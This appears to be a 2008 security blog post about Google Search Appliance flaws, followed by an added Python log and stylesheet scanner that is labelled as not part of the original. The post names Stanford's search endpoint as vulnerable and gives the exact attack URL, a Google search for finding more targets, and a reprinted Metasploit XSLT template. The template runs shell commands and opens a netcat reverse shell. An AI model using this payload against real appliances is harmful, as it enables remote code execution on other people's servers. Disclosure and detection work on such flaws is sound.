Google Search Appliance Issues.

Published on: 1207488114
At the same moment I posted about an XSS issue in Mitre [2] (which uses the Google Search Appliance), Giorgio Maone was blogging about something similar, but on the website of Symantec [1]. Might there be a pattern here? I thought that Google had fixed all the cross-site scripting issues and problems with the proxy stylesheet? Or did they never patch their clients? Or did their clients never patch themselves? Whatever the case may be, this isn't good. It means that more hosts are vulnerable if Mitre was and Symantec still is. The problem is, it doesn't stop at XSS alone; think again. In 2005 Metasploit released a proof of concept that fetches a remote proxy stylesheet, which allows remote XSLT Java code execution on the machine. If Google did not fix the XSS issues, as we explain here, might there be a chance that some of the appliances are also still vulnerable to XSLT code execution? Maybe!

In any case, Stanford University is still vulnerable to remote XSLT stylesheet inclusion, which suggests that probably many more hosts are still vulnerable [5].



http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&proxystylesheet=_stylesheet_&site=stanfordit


Just grab one from the net to test it:

http://www.in.gov/ai/appfiles/search/google_dwd.xml


As learned from history and Metasploit [3], this can be a very bad idea:



<xsl:template name="my_page_footer"
    xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
    xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime">

<!-- Google Mini XSLT Code Execution [metasploit] -->
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
OS: <xsl:value-of select="sys:getProperty('os.name')" />
Version: <xsl:value-of select="sys:getProperty('os.version')" />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" />
UserName: <xsl:value-of select="sys:getProperty('user.name')" />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" />
Executing command...
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />

</xsl:template>
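
As an added defensive example (not code from the original post or from Metasploit), the following Python flags access-log requests whose proxystylesheet parameter is anything other than a plain front-end name, and scans a fetched stylesheet for the Java extension namespaces the template above relies on. The log lines, the 198.51.100.7 host and the Xalan-J namespace are constructed or assumed here, not taken from the post.

```python
import io
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Namespace prefixes that hand Java classes to a stylesheet: the Oracle family used
# by the Metasploit template above, plus Apache Xalan-J's (added from general knowledge).
JAVA_EXT_PREFIXES = ("http://www.oracle.com/XSL/Transform/java/",
                     "http://xml.apache.org/xalan/java")
# A real front-end stylesheet is a short id like "stanford", never a URL or a path.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # target from a combined-format log line

def unsafe_proxystylesheet(request_target):
    """Return the offending proxystylesheet value, or None if the request looks fine."""
    query = parse_qs(urlsplit(request_target).query)
    for value in query.get("proxystylesheet", []):   # already %-decoded by parse_qs
        if not SAFE_NAME.match(value):
            return value
    return None

def flag_log_lines(lines):
    """Return (line_no, value) for log lines whose proxystylesheet is not a plain name."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        bad = unsafe_proxystylesheet(m.group(1)) if m else None
        if bad is not None:
            hits.append((n, bad))
    return hits

def java_extension_namespaces(xslt_text):
    """Return the Java-extension namespace URIs declared anywhere in an XSLT document."""
    found = set()
    events = ET.iterparse(io.BytesIO(xslt_text.encode()), events=("start-ns",))
    for _event, (_prefix, uri) in events:   # fires for every xmlns:* declaration
        if uri.startswith(JAVA_EXT_PREFIXES):
            found.add(uri)
    return found

# Constructed sample data (not real traffic): a normal query, one pointing off-host, one Java namespace.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Apr/2008:12:00:01 +0000] "GET /search?q=ldap&client=stanford&proxystylesheet=stanford HTTP/1.1" 200 5120',
    '10.0.0.9 - - [06/Apr/2008:12:00:07 +0000] "GET /search?output=xml_no_dtd&proxystylesheet=http://198.51.100.7/s.xml HTTP/1.1" 200 812',
]
SAMPLE_XSLT = ('<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
               'xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"><xsl:template match="/"/></xsl:stylesheet>')

if __name__ == "__main__":
    print(flag_log_lines(SAMPLE_LOG), sorted(java_extension_namespaces(SAMPLE_XSLT)))
```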




Conclusion.

Never trust third-party appliances, even if they are from Google and even if Google says they are secure [4].



References:



[1] http://hackademix.net/2008/04/05/symantec-vulnerabilities-and-hard-things-to-do/

[2] http://www.0x000000.com/index.php?i=546

[3] http://metasploit.com/research/vulnerabilities/google_proxystylesheet/

[4] http://www.google.com/support/gsa/bin/answer.py?answer=15857

[5] http://www.google.com/search?q=inurl:proxystylesheet